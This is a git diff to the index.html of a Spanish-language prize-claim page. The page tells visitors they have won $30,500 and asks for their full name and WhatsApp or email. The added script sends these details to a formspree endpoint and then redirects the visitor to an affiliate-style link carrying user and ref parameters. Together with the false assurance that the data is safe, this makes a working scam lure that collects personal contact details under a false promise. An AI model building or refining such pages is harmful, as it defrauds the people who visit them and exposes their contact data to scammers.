--- a/index.html
+++ b/index.html
@@ -34,17 +34,56 @@
       Completa el formulario para reclamar tu premio.
     </p>
 
-    <form action="https://formspree.io/f/xzdrqyke" method="POST">
+    <form id="claimForm" action="https://formspree.io/f/xzdrqyke" method="POST">
       <input type="text" name="nombre" placeholder="Nombre Completo" required>
       <input type="text" name="contacto" placeholder="WhatsApp o Email" required>
       <input type="hidden" name="premio" value="Ganaste $30,500">
 
-      <button type="submit">Reclamar Premio</button>
+      <button type="submit" id="submitBtn">Reclamar Premio</button>
     </form>
 
     <p class="small-note">Tus datos están seguros — te contactaremos pronto.</p>
   </div>
 
   <script src="script.js"></script>
+
+  <!-- Form submission with redirect to your new link -->
+  <script>
+    document.getElementById('claimForm').addEventListener('submit', function(event) {
+      event.preventDefault(); // Prevent page reload
+
+      const form = event.target;
+      const submitBtn = document.getElementById('submitBtn');
+      submitBtn.disabled = true;
+      submitBtn.textContent = "Enviando...";
+
+      const formData = new FormData(form);
+
+      fetch(form.action, {
+        method: 'POST',
+        body: formData,
+        headers: {
+          'Accept': 'application/json'
+        }
+      })
+      .then(response => {
+        if (response.ok) {
+          // Success: redirect to the new link
+          window.location.href = "https://www.latgree.com/?user=27977&ref=44947";
+        } else {
+          alert("Error al enviar. Por favor, intenta de nuevo.");
+          submitBtn.disabled = false;
+          submitBtn.textContent = "Reclamar Premio";
+        }
+      })
+      .catch(error => {
+        console.error('Error:', error);
+        alert("Problema de conexión. Verifica tu internet e intenta otra vez.");
+        submitBtn.disabled = false;
+        submitBtn.textContent = "Reclamar Premio";
+      });
+    });
+  </script>
+
 </body>
 </html>
